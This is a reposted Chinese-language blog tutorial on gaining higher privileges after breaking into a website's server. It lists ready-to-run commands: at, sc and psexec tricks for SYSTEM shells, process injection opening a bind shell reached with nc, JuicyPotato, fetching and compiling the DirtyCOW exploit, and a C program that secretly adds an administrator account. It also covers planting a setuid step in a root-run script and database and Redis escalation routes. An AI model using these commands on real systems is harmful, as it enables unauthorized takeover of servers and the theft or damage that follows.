目錄
- 什么是提權
- 用戶劃分
- windows權限
- linux權限
- 提權類別
- 本地提權
- 1.AT命令提權
- 2.SC命令提權
- 3.內核提權
- 4.注入行程提權
- 注入行程提權的流程
- 漏洞提權
- 爛土豆提權
- 限制條件
- webshell版腳本
- 臟牛提權
- 巴西烤肉
- 利用配置不當提權
- 使用icacls軟體(windows)
- linux
- 1. 找到配置不當的檔案
- 2.在目標檔案里添加腳本
- 其它提權方式
- 資料庫提權
- 1.my sql提權
- ①.udf提權
- ②.mof提權
- ③.反彈shell提權
- 2.Sql server提權
- 3.redis提權
- 4.oracle提權
- 第三方軟體/服務提權
什么是提權
為了提高自己在服務器中的權限所進行的操作
主要針對網站入侵程序中,當入侵某一網站時,通過各種漏洞上傳shell,以奪得該服務器權限,
? 作業系統安全的基礎
用戶空間 與 內核空間 是隔離的,
內核空間是內核代碼運行的地方,用戶空間是用戶程式代碼運行的地方,所以如果用戶的程式崩潰了,內核是不受影響,
當行程運行在內核空間時就處于內核態,當行程運行在用戶空間時就處于用戶態,
? 賬號分類
本地系統帳戶(SYSTEM):
本地系統帳戶是一個具有完全系統訪問權并且在網路中擔當計算機的超級帳戶,
本地服務帳戶(LOCAL SERVICE):
本地服務帳戶是一個類似于經過認證的用戶帳戶的特殊的內置帳戶,本地服務帳戶具有和 Users 用戶組成員相同級別的資源和物件訪問權,
網路服務帳戶(NETWORK SERVICE):
網路服務帳戶是一個類似于經過認證的用戶帳戶的特殊的內置帳戶,網路服務帳戶具有和 Users 用戶組成員相同級別的資源和物件訪問權,
用戶賬號在登陸時獲取權限令牌
而服務賬號無需用戶登陸,會自己在后臺啟動服務
各賬號間權限不一樣
用戶劃分
windows系統的用戶分為三類
user 、 administrator 、system
linux系統分為兩類
user 、root
windows權限
windows權限有三種,
user 有普通用戶權限
administrator 有用戶管理員權限
system 有系統管理員權限
linux權限
user 普通權限
root 管理員權限
提權類別
本地提權
配置提權
漏洞提權
本地提權
1.AT命令提權
首先以administrator身份打開cmd
然后輸入:at 10:21 /interactive cmd
然后在10:21的時候,打開了一個cmd
2.SC命令提權
sc Create syscmd binpath="cmd/k start" type= own type= interact
sc start syscmd
system 服務名字,可以隨便取
binpath 環境變數,執行的路徑
3.內核提權
psexec -i -s -d cmd
4.注入行程提權
pinjector.exe -p 2152 cmd 12345
注入行程提權的流程
首先在靶機上的身份是administrator,靶機ip是172.16.11.141
進入靶機里pinjector.exe的所在的根目錄,
然后pinjector.exe -l 查看可以注入的行程
選擇你想注入的行程
pinjector.exe -p 1444 cmd 5432
-p 是選擇注入的行程的pid,這里的5432是埠
nc 172.16.11.141 5432
漏洞提權
爛土豆提權
屬于令牌提權
限制條件
需要支持SeImpersonate或者SeAssignPrimaryToken權限
開啟DCOM
本地支持RPC或者遠程服務器支持PRC并能成功登錄
能夠找到可用的COM物件
webshell版腳本
Juicypotato.exe –p whoami
臟牛提權
屬于linux內核提權
下載現成的exp
https://github.com/FireFart/dirtycow
然后編譯生成一個可執行的檔案
gcc -pthread dirty.c -o dirty -lcrypt
最后提權
巴西烤肉
net localgroup administrators admin123456 /add
利用配置不當提權
與利用漏洞提權相比,此方法更常用
大部分企業,會對系統的漏洞即時進行補丁更新,很難通過系統的漏洞進行入侵;
查找系統中以system權限啟動的服務或應用,可以嘗試將其替換或者反彈shell的方式提權;
可以查找NTFS權限允許users修改洗掉的應用,利用配置不當進行提權;
代碼中是否有過濾引數的操作等都可以加以利用,進行提取;
使用icacls軟體(windows)
icacls
icacls c:\windows\*.exe /save perm /T
i586-mingw32msvc-gcc -o admin.exe admin.c //因為exe要給windows用所以這里使用i586-mingw32msvc-gcc這個編譯
admin.c
#include<stdlib.h>
int main()
{
int i;
i=system("net localgroup administrators a /add");
return 0;
}
只要管理員點擊admin.exe,就會將用戶a添加到管理員組
linux
1. 找到配置不當的檔案
方法1
find / -perm 777 -exec ls -l {} \;
-perm 777 :指定權限為777的檔案
-exec ls-l : 對匹配的檔案執行ls -l命令
{} \ ; ---------->格式
方法2
find / -writable -type f 2 >/dev/null | grep -v "/proc/“.
/proc:下多為系統啟動的程式,一般不會有普通用戶有可執行權限的程式
2.在目標檔案里添加腳本
如第一步找到了usr檔案下的123.sh符合條件
即 /usr/123. sh
就在123.sh里添加chmod u+s /bin/dash
然后當管理員執行這個腳本的時候
sh /usr/123. sh
普通用戶就可以使用dash獲得管理員權限
/bin/bash
還可以從應用系統的組態檔 、應用連接資料庫的組態檔下手
其它提權方式
資料庫提權
1.my sql提權
①.udf提權
1、知道root賬號密碼
2、win2000,2003系統
3、需要secure_file_priv函式打開
利用自定義函式功能,將mysql賬號換為系統system權限
②.mof提權
1、win2003 以下版本
2、secure_file_priv引數不為null
③.反彈shell提權
2.Sql server提權
①、有sa權限
-
執行命令存盤程序
xp_cmdshell sp_OACreate sp_oamethod -
注冊表存盤程序
xp_regwrite
②、有dba權限
-
列目標存盤程序
xp_dirtree xp_subdirs -
備份檔案
備份到網站目錄 通過備份檔案到啟動項提權
3.redis提權
未授權訪問
1、webshell
2、上傳公鑰
3、反彈shell
4.oracle提權
1、dba權限執行系統命令
第三方軟體/服務提權
windows開機時候都會有一些開機啟動的程式,那時候啟動的程式權限都是system,因為是system把他們啟動的,利用這點,我們可以將自動化腳本寫入啟動項,達到提權的目的,
轉載請註明出處,本文鏈接:https://www.uj5u.com/houduan/192674.html
標籤:python